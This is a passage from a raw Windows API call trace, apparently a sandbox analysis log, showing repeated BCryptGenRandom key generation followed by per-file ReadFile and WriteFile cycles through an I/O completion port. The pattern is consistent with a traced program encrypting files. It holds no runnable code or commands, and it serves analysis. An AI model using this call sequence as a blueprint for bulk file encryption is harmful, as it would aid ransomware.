lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.666] CloseHandle (hObject=0x308) returned 1 [0196.671] free (_Block=0x3d70450) [0196.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.672] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.730] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.730] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.730] free (_Block=0x3e305b8) [0196.730] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.730] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.731] free (_Block=0x1fa91d0) [0196.731] free (_Block=0x1fa2ed8) [0196.731] free (_Block=0x1fa90b8) [0196.731] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0196.731] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.739] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1216, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.743] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x8cc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0196.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.744] CloseHandle (hObject=0x3cc) returned 1 [0196.744] free (_Block=0x3f70048) [0196.744] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.746] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.746] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.746] free (_Block=0x3e305b8) [0196.746] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.746] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.746] free (_Block=0x1fa91d0) [0196.746] free (_Block=0x1fa2ed8) [0196.746] free (_Block=0x1fa90b8) [0196.746] WriteFile (in: hFile=0x330, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0196.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.748] WriteFile (in: hFile=0x330, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x8ed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0196.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.750] CloseHandle (hObject=0x330) returned 1 [0196.750] free (_Block=0x3ef0008) [0196.750] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.759] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.759] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.759] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.760] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.760] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.760] free (_Block=0x3e305b8) [0196.760] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.760] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.761] free (_Block=0x1fa91d0) [0196.761] free (_Block=0x1fa2ed8) [0196.761] free (_Block=0x1fa90b8) [0196.761] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.761] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.796] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x341e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.821] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x900, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.821] CloseHandle (hObject=0x330) returned 1 [0196.822] free (_Block=0x3df0008) [0196.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.830] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.830] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.830] free (_Block=0x3e305b8) [0196.830] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.830] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.830] free (_Block=0x1fa91d0) [0196.830] free (_Block=0x1fa2ed8) [0196.830] free (_Block=0x1fa90b8) [0196.830] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.831] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.842] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x948, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.843] CloseHandle (hObject=0x330) returned 1 [0196.843] free (_Block=0x3df0008) [0196.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.853] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.853] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.853] free (_Block=0x3e305b8) [0196.853] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.853] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.853] free (_Block=0x1fa91d0) [0196.853] free (_Block=0x1fa2ed8) [0196.853] free (_Block=0x1fa90b8) [0196.853] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.853] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.855] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x23a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.866] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.866] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.867] CloseHandle (hObject=0x330) returned 1 [0196.867] free (_Block=0x3df0008) [0196.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.875] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.875] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.875] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.875] free (_Block=0x3e305b8) [0196.875] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.875] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.876] free (_Block=0x1fa91d0) [0196.876] free (_Block=0x1fa2ed8) [0196.876] free (_Block=0x1fa90b8) [0196.876] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.876] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.877] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.887] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb34e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.902] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11be, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.903] CloseHandle (hObject=0x330) returned 1 [0196.903] free (_Block=0x3df0008) [0196.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.913] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.914] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.914] free (_Block=0x3e305b8) [0196.914] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.914] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.914] free (_Block=0x1fa91d0) [0196.914] free (_Block=0x1fa2ed8) [0196.914] free (_Block=0x1fa90b8) [0196.914] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.915] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.926] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb7a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.927] CloseHandle (hObject=0x330) returned 1 [0196.927] free (_Block=0x3df0008) [0196.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.946] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.946] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.946] free (_Block=0x3e305b8) [0196.946] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.946] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.947] free (_Block=0x1fa91d0) [0196.947] free (_Block=0x1fa2ed8) [0196.947] free (_Block=0x1fa90b8) [0196.947] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.979] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.979] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.980] free (_Block=0x3e305b8) [0196.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.980] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.980] free (_Block=0x1fa91d0) [0196.980] free (_Block=0x1fa2ed8) [0196.980] free (_Block=0x1fa90b8) [0196.980] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 